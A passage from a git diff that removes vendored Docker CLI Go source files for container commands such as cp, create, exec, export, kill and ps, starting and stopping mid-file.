stdin\n", - "and extract it to a directory destination in a container.\n", - "Use '-' as the destination to stream a tar archive of a\n", - "container source to stdout.", - }, ""), - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - if args[0] == "" { - return fmt.Errorf("source can not be empty") - } - if args[1] 
== "" { - return fmt.Errorf("destination can not be empty") - } - opts.source = args[0] - opts.destination = args[1] - return runCopy(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH") - - return cmd -} - -func runCopy(dockerCli *command.DockerCli, opts copyOptions) error { - srcContainer, srcPath := splitCpArg(opts.source) - dstContainer, dstPath := splitCpArg(opts.destination) - - var direction copyDirection - if srcContainer != "" { - direction |= fromContainer - } - if dstContainer != "" { - direction |= toContainer - } - - cpParam := &cpConfig{ - followLink: opts.followLink, - } - - ctx := context.Background() - - switch direction { - case fromContainer: - return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam) - case toContainer: - return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam) - case acrossContainers: - // Copying between containers isn't supported. - return fmt.Errorf("copying between containers is not supported") - default: - // User didn't specify any container. - return fmt.Errorf("must specify at least one container source") - } -} - -func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) { - return dockerCli.Client().ContainerStatPath(ctx, containerName, path) -} - -func resolveLocalPath(localPath string) (absPath string, err error) { - if absPath, err = filepath.Abs(localPath); err != nil { - return - } - - return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil -} - -func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) { - if dstPath != "-" { - // Get an absolute destination path. 
- dstPath, err = resolveLocalPath(dstPath) - if err != nil { - return err - } - } - - // if client requests to follow symbol link, then must decide target file to be copied - var rebaseName string - if cpParam.followLink { - srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath) - - // If the destination is a symbolic link, we should follow it. - if err == nil && srcStat.Mode&os.ModeSymlink != 0 { - linkTarget := srcStat.LinkTarget - if !system.IsAbs(linkTarget) { - // Join with the parent directory. - srcParent, _ := archive.SplitPathDirEntry(srcPath) - linkTarget = filepath.Join(srcParent, linkTarget) - } - - linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget) - srcPath = linkTarget - } - - } - - content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath) - if err != nil { - return err - } - defer content.Close() - - if dstPath == "-" { - // Send the response to STDOUT. - _, err = io.Copy(os.Stdout, content) - - return err - } - - // Prepare source copy info. - srcInfo := archive.CopyInfo{ - Path: srcPath, - Exists: true, - IsDir: stat.Mode.IsDir(), - RebaseName: rebaseName, - } - - preArchive := content - if len(srcInfo.RebaseName) != 0 { - _, srcBase := archive.SplitPathDirEntry(srcInfo.Path) - preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName) - } - // See comments in the implementation of `archive.CopyTo` for exactly what - // goes into deciding how and whether the source archive needs to be - // altered for the correct copy behavior. - return archive.CopyTo(preArchive, srcInfo, dstPath) -} - -func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) { - if srcPath != "-" { - // Get an absolute source path. 
- srcPath, err = resolveLocalPath(srcPath) - if err != nil { - return err - } - } - - // In order to get the copy behavior right, we need to know information - // about both the source and destination. The API is a simple tar - // archive/extract API but we can use the stat info header about the - // destination to be more informed about exactly what the destination is. - - // Prepare destination copy info by stat-ing the container path. - dstInfo := archive.CopyInfo{Path: dstPath} - dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath) - - // If the destination is a symbolic link, we should evaluate it. - if err == nil && dstStat.Mode&os.ModeSymlink != 0 { - linkTarget := dstStat.LinkTarget - if !system.IsAbs(linkTarget) { - // Join with the parent directory. - dstParent, _ := archive.SplitPathDirEntry(dstPath) - linkTarget = filepath.Join(dstParent, linkTarget) - } - - dstInfo.Path = linkTarget - dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget) - } - - // Ignore any error and assume that the parent directory of the destination - // path exists, in which case the copy may still succeed. If there is any - // type of conflict (e.g., non-directory overwriting an existing directory - // or vice versa) the extraction will fail. If the destination simply did - // not exist, but the parent directory does, the extraction will still - // succeed. - if err == nil { - dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir() - } - - var ( - content io.Reader - resolvedDstPath string - ) - - if srcPath == "-" { - // Use STDIN. - content = os.Stdin - resolvedDstPath = dstInfo.Path - if !dstInfo.IsDir { - return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath)) - } - } else { - // Prepare source copy info. 
- srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink) - if err != nil { - return err - } - - srcArchive, err := archive.TarResource(srcInfo) - if err != nil { - return err - } - defer srcArchive.Close() - - // With the stat info about the local source as well as the - // destination, we have enough information to know whether we need to - // alter the archive that we upload so that when the server extracts - // it to the specified directory in the container we get the desired - // copy behavior. - - // See comments in the implementation of `archive.PrepareArchiveCopy` - // for exactly what goes into deciding how and whether the source - // archive needs to be altered for the correct copy behavior when it is - // extracted. This function also infers from the source and destination - // info which directory to extract to, which may be the parent of the - // destination that the user specified. - dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo) - if err != nil { - return err - } - defer preparedArchive.Close() - - resolvedDstPath = dstDir - content = preparedArchive - } - - options := types.CopyToContainerOptions{ - AllowOverwriteDirWithFile: false, - } - - return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options) -} - -// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be -// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by -// requiring a LOCALPATH with a `:` to be made explicit with a relative or -// absolute path: -// `/path/to/file:name.txt` or `./file:name.txt` -// -// This is apparently how `scp` handles this as well: -// http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/ -// -// We can't simply check for a filepath separator because container names may -// have a separator, e.g., "host0/cname1" if container is in a Docker cluster, -// so we have to check for a `/` or `.` prefix. 
Also, in the case of a Windows -// client, a `:` could be part of an absolute Windows path, in which case it -// is immediately proceeded by a backslash. -func splitCpArg(arg string) (container, path string) { - if system.IsAbs(arg) { - // Explicit local absolute path, e.g., `C:\foo` or `/foo`. - return "", arg - } - - parts := strings.SplitN(arg, ":", 2) - - if len(parts) == 1 || strings.HasPrefix(parts[0], ".") { - // Either there's no `:` in the arg - // OR it's an explicit local relative path like `./file:name.txt`. - return "", arg - } - - return parts[0], parts[1] -} diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go deleted file mode 100644 index d5e63bd9ef..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/create.go +++ /dev/null @@ -1,218 +0,0 @@ -package container - -import ( - "fmt" - "io" - "os" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - // FIXME migrate to docker/distribution/reference - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - apiclient "github.com/docker/docker/client" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type createOptions struct { - name string -} - -// NewCreateCommand creates a new cobra.Command for `docker create` -func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts createOptions - var copts *runconfigopts.ContainerOptions - - cmd := &cobra.Command{ - Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Create a new container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd 
*cobra.Command, args []string) error { - copts.Image = args[0] - if len(args) > 1 { - copts.Args = args[1:] - } - return runCreate(dockerCli, cmd.Flags(), &opts, copts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.StringVar(&opts.name, "name", "", "Assign a name to the container") - - // Add an explicit help that doesn't have a `-h` to prevent the conflict - // with hostname - flags.Bool("help", false, "Print usage") - - command.AddTrustedFlags(flags, true) - copts = runconfigopts.AddFlags(flags) - return cmd -} - -func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error { - config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) - if err != nil { - reportError(dockerCli.Err(), "create", err.Error(), true) - return cli.StatusError{StatusCode: 125} - } - response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) - return nil -} - -func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error { - ref, err := reference.ParseNamed(image) - if err != nil { - return err - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return err - } - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - - options := types.ImageCreateOptions{ - RegistryAuth: encodedAuth, - } - - responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesStream( - responseBody, - out, - dockerCli.Out().FD(), - dockerCli.Out().IsTerminal(), - nil) -} - 
-type cidFile struct { - path string - file *os.File - written bool -} - -func (cid *cidFile) Close() error { - cid.file.Close() - - if !cid.written { - if err := os.Remove(cid.path); err != nil { - return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err) - } - } - - return nil -} - -func (cid *cidFile) Write(id string) error { - if _, err := cid.file.Write([]byte(id)); err != nil { - return fmt.Errorf("Failed to write the container ID to the file: %s", err) - } - cid.written = true - return nil -} - -func newCIDFile(path string) (*cidFile, error) { - if _, err := os.Stat(path); err == nil { - return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path) - } - - f, err := os.Create(path) - if err != nil { - return nil, fmt.Errorf("Failed to create the container ID file: %s", err) - } - - return &cidFile{path: path, file: f}, nil -} - -func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) { - stderr := dockerCli.Err() - - var containerIDFile *cidFile - if cidfile != "" { - var err error - if containerIDFile, err = newCIDFile(cidfile); err != nil { - return nil, err - } - defer containerIDFile.Close() - } - - var trustedRef reference.Canonical - _, ref, err := reference.ParseIDOrReference(config.Image) - if err != nil { - return nil, err - } - if ref != nil { - ref = reference.WithDefaultTag(ref) - - if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { - var err error - trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil) - if err != nil { - return nil, err - } - config.Image = trustedRef.String() - } - } - - //create the container - response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) - - //if image not found try to pull it 
- if err != nil { - if apiclient.IsErrImageNotFound(err) && ref != nil { - fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String()) - - // we don't want to write to stdout anything apart from container.ID - if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil { - return nil, err - } - if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil { - if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil { - return nil, err - } - } - // Retry - var retryErr error - response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) - if retryErr != nil { - return nil, retryErr - } - } else { - return nil, err - } - } - - for _, warning := range response.Warnings { - fmt.Fprintf(stderr, "WARNING: %s\n", warning) - } - if containerIDFile != nil { - if err = containerIDFile.Write(response.ID); err != nil { - return nil, err - } - } - return &response, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go deleted file mode 100644 index 12d6591014..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/diff.go +++ /dev/null @@ -1,58 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/spf13/cobra" -) - -type diffOptions struct { - container string -} - -// NewDiffCommand creates a new cobra.Command for `docker diff` -func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts diffOptions - - return &cobra.Command{ - Use: "diff CONTAINER", - Short: "Inspect changes on a container's filesystem", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runDiff(dockerCli, &opts) - }, - } -} - -func runDiff(dockerCli *command.DockerCli, opts 
*diffOptions) error { - if opts.container == "" { - return fmt.Errorf("Container name cannot be empty") - } - ctx := context.Background() - - changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container) - if err != nil { - return err - } - - for _, change := range changes { - var kind string - switch change.Kind { - case archive.ChangeModify: - kind = "C" - case archive.ChangeAdd: - kind = "A" - case archive.ChangeDelete: - kind = "D" - } - fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go deleted file mode 100644 index f0381494e2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/exec.go +++ /dev/null @@ -1,207 +0,0 @@ -package container - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - apiclient "github.com/docker/docker/client" - options "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/promise" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type execOptions struct { - detachKeys string - interactive bool - tty bool - detach bool - user string - privileged bool - env *options.ListOpts -} - -func newExecOptions() *execOptions { - var values []string - return &execOptions{ - env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv), - } -} - -// NewExecCommand creats a new cobra.Command for `docker exec` -func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := newExecOptions() - - cmd := &cobra.Command{ - Use: "exec [OPTIONS] CONTAINER COMMAND [ARG...]", - Short: "Run a command in a running container", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - container := args[0] - execCmd := 
args[1:] - return runExec(dockerCli, opts, container, execCmd) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container") - flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached") - flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY") - flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background") - flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: [:])") - flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command") - flags.VarP(opts.env, "env", "e", "Set environment variables") - flags.SetAnnotation("env", "version", []string{"1.25"}) - - return cmd -} - -func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error { - execConfig, err := parseExec(opts, execCmd) - // just in case the ParseExec does not exit - if container == "" || err != nil { - return cli.StatusError{StatusCode: 1} - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - // Send client escape keys - execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys - - ctx := context.Background() - client := dockerCli.Client() - - response, err := client.ContainerExecCreate(ctx, container, *execConfig) - if err != nil { - return err - } - - execID := response.ID - if execID == "" { - fmt.Fprintf(dockerCli.Out(), "exec ID empty") - return nil - } - - //Temp struct for execStart so that we don't need to transfer all the execConfig - if !execConfig.Detach { - if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil { - return err - } - } else { - execStartCheck := types.ExecStartCheck{ - Detach: execConfig.Detach, - Tty: execConfig.Tty, - } - - if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != 
nil { - return err - } - // For now don't print this - wait for when we support exec wait() - // fmt.Fprintf(dockerCli.Out(), "%s\n", execID) - return nil - } - - // Interactive exec requested. - var ( - out, stderr io.Writer - in io.ReadCloser - errCh chan error - ) - - if execConfig.AttachStdin { - in = dockerCli.In() - } - if execConfig.AttachStdout { - out = dockerCli.Out() - } - if execConfig.AttachStderr { - if execConfig.Tty { - stderr = dockerCli.Out() - } else { - stderr = dockerCli.Err() - } - } - - resp, err := client.ContainerExecAttach(ctx, execID, *execConfig) - if err != nil { - return err - } - defer resp.Close() - errCh = promise.Go(func() error { - return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp) - }) - - if execConfig.Tty && dockerCli.In().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil { - fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) - } - } - - if err := <-errCh; err != nil { - logrus.Debugf("Error hijack: %s", err) - return err - } - - var status int - if _, status, err = getExecExitCode(ctx, client, execID); err != nil { - return err - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - - return nil -} - -// getExecExitCode perform an inspect on the exec command. It returns -// the running state and the exit code. -func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) { - resp, err := client.ContainerExecInspect(ctx, execID) - if err != nil { - // If we can't connect, then the daemon probably died. - if !apiclient.IsErrConnectionFailed(err) { - return false, -1, err - } - return false, -1, nil - } - - return resp.Running, resp.ExitCode, nil -} - -// parseExec parses the specified args for the specified command and generates -// an ExecConfig from it. 
-func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) { - execConfig := &types.ExecConfig{ - User: opts.user, - Privileged: opts.privileged, - Tty: opts.tty, - Cmd: execCmd, - Detach: opts.detach, - } - - // If -d is not set, attach to everything by default - if !opts.detach { - execConfig.AttachStdout = true - execConfig.AttachStderr = true - if opts.interactive { - execConfig.AttachStdin = true - } - } - - if opts.env != nil { - execConfig.Env = opts.env.GetAll() - } - - return execConfig, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go deleted file mode 100644 index baeeaf1904..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/exec_test.go +++ /dev/null @@ -1,116 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -type arguments struct { - options execOptions - execCmd []string -} - -func TestParseExec(t *testing.T) { - valids := map[*arguments]*types.ExecConfig{ - &arguments{ - execCmd: []string{"command"}, - }: { - Cmd: []string{"command"}, - AttachStdout: true, - AttachStderr: true, - }, - &arguments{ - execCmd: []string{"command1", "command2"}, - }: { - Cmd: []string{"command1", "command2"}, - AttachStdout: true, - AttachStderr: true, - }, - &arguments{ - options: execOptions{ - interactive: true, - tty: true, - user: "uid", - }, - execCmd: []string{"command"}, - }: { - User: "uid", - AttachStdin: true, - AttachStdout: true, - AttachStderr: true, - Tty: true, - Cmd: []string{"command"}, - }, - &arguments{ - options: execOptions{ - detach: true, - }, - execCmd: []string{"command"}, - }: { - AttachStdin: false, - AttachStdout: false, - AttachStderr: false, - Detach: true, - Cmd: []string{"command"}, - }, - &arguments{ - options: execOptions{ - tty: true, - interactive: true, - detach: true, - }, - execCmd: []string{"command"}, - }: { - AttachStdin: false, - 
AttachStdout: false, - AttachStderr: false, - Detach: true, - Tty: true, - Cmd: []string{"command"}, - }, - } - - for valid, expectedExecConfig := range valids { - execConfig, err := parseExec(&valid.options, valid.execCmd) - if err != nil { - t.Fatal(err) - } - if !compareExecConfig(expectedExecConfig, execConfig) { - t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig) - } - } -} - -func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool { - if config1.AttachStderr != config2.AttachStderr { - return false - } - if config1.AttachStdin != config2.AttachStdin { - return false - } - if config1.AttachStdout != config2.AttachStdout { - return false - } - if config1.Detach != config2.Detach { - return false - } - if config1.Privileged != config2.Privileged { - return false - } - if config1.Tty != config2.Tty { - return false - } - if config1.User != config2.User { - return false - } - if len(config1.Cmd) != len(config2.Cmd) { - return false - } - for index, value := range config1.Cmd { - if value != config2.Cmd[index] { - return false - } - } - return true -} diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go deleted file mode 100644 index 8fa2e5d77e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/export.go +++ /dev/null @@ -1,59 +0,0 @@ -package container - -import ( - "errors" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type exportOptions struct { - container string - output string -} - -// NewExportCommand creates a new `docker export` command -func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts exportOptions - - cmd := &cobra.Command{ - Use: "export [OPTIONS] CONTAINER", - Short: "Export a container's filesystem as a tar archive", - Args: cli.ExactArgs(1), - RunE: 
func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runExport(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") - - return cmd -} - -func runExport(dockerCli *command.DockerCli, opts exportOptions) error { - if opts.output == "" && dockerCli.Out().IsTerminal() { - return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") - } - - clnt := dockerCli.Client() - - responseBody, err := clnt.ContainerExport(context.Background(), opts.container) - if err != nil { - return err - } - defer responseBody.Close() - - if opts.output == "" { - _, err := io.Copy(dockerCli.Out(), responseBody) - return err - } - - return command.CopyToFile(opts.output, responseBody) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go deleted file mode 100644 index ca136f0e43..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/hijack.go +++ /dev/null @@ -1,116 +0,0 @@ -package container - -import ( - "io" - "runtime" - "sync" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stdcopy" - "golang.org/x/net/context" -) - -// holdHijackedConnection handles copying input to and output from streams to the -// connection -func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error { - var ( - err error - restoreOnce sync.Once - ) - if inputStream != nil && tty { - if err := setRawTerminal(streams); err != nil { - return err - } - defer func() { - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - }() - } - - receiveStdout := make(chan error, 1) - if outputStream != nil || errorStream != nil { - go func() { 
- // When TTY is ON, use regular copy - if tty && outputStream != nil { - _, err = io.Copy(outputStream, resp.Reader) - // we should restore the terminal as soon as possible once connection end - // so any following print messages will be in normal type. - if inputStream != nil { - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - } - } else { - _, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader) - } - - logrus.Debug("[hijack] End of stdout") - receiveStdout <- err - }() - } - - stdinDone := make(chan struct{}) - go func() { - if inputStream != nil { - io.Copy(resp.Conn, inputStream) - // we should restore the terminal as soon as possible once connection end - // so any following print messages will be in normal type. - if tty { - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - } - logrus.Debug("[hijack] End of stdin") - } - - if err := resp.CloseWrite(); err != nil { - logrus.Debugf("Couldn't send EOF: %s", err) - } - close(stdinDone) - }() - - select { - case err := <-receiveStdout: - if err != nil { - logrus.Debugf("Error receiveStdout: %s", err) - return err - } - case <-stdinDone: - if outputStream != nil || errorStream != nil { - select { - case err := <-receiveStdout: - if err != nil { - logrus.Debugf("Error receiveStdout: %s", err) - return err - } - case <-ctx.Done(): - } - } - case <-ctx.Done(): - } - - return nil -} - -func setRawTerminal(streams command.Streams) error { - if err := streams.In().SetRawTerminal(); err != nil { - return err - } - return streams.Out().SetRawTerminal() -} - -func restoreTerminal(streams command.Streams, in io.Closer) error { - streams.In().RestoreTerminal() - streams.Out().RestoreTerminal() - // WARNING: DO NOT REMOVE THE OS CHECK !!! - // For some reason this Close call blocks on darwin.. - // As the client exists right after, simply discard the close - // until we find a better solution. 
- if in != nil && runtime.GOOS != "darwin" { - return in.Close() - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go deleted file mode 100644 index 08a8d244df..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/inspect.go +++ /dev/null @@ -1,47 +0,0 @@ -package container - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - size bool - refs []string -} - -// newInspectCommand creates a new cobra.Command for `docker container inspect` -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Display detailed information on one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - getRefFunc := func(ref string) (interface{}, []byte, error) { - return client.ContainerInspectWithRaw(ctx, ref, opts.size) - } - return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go deleted file mode 100644 index 6da91a40e3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/kill.go +++ 
/dev/null @@ -1,56 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type killOptions struct { - signal string - - containers []string -} - -// NewKillCommand creates a new cobra.Command for `docker kill` -func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts killOptions - - cmd := &cobra.Command{ - Use: "kill [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Kill one or more running containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runKill(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container") - return cmd -} - -func runKill(dockerCli *command.DockerCli, opts *killOptions) error { - var errs []string - ctx := context.Background() - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { - return dockerCli.Client().ContainerKill(ctx, container, opts.signal) - }) - for _, name := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go deleted file mode 100644 index 5bbf41966d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/list.go +++ /dev/null @@ -1,141 +0,0 @@ -package container - -import ( - "io/ioutil" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - 
"github.com/docker/docker/opts" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -type psOptions struct { - quiet bool - size bool - all bool - noTrunc bool - nLatest bool - last int - format string - filter opts.FilterOpt -} - -// NewPsCommand creates a new cobra.Command for `docker ps` -func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS]", - Short: "List containers", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runPs(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") - flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)") - flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)") - flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := *NewPsCommand(dockerCli) - cmd.Aliases = []string{"ps", "list"} - cmd.Use = "ls [OPTIONS]" - return &cmd -} - -// listOptionsProcessor is used to set any container list options which may only -// be embedded in the format template. -// This is passed directly into tmpl.Execute in order to allow the preprocessor 